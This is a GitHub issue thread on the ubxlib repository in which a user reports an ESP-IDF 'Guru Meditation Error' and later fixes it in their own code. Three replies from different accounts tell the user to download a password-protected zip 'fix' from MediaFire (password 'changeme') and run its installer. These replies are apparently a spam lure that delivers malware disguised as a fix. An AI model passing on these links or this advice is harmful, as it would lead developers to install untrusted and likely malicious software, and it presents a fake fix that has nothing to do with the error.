u-blox/ubxlib #275: Guru Meditation Error

alexmaron81, 2024-08-28:
Hi Rob, I recently got the following error.

I am using the latest ESP-IDF 3.5, could this have something to do with it?

[image]

Vomgnar, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

alexmaron81, 2024-08-28:
What is it?

HeinousAgenda38, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

qiliq, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

alexmaron81, 2024-08-28:
I have solved the problem. It was due to the wrong up in my code.
You can delete the topic completely.

closed 2024-08-28 by alexmaron81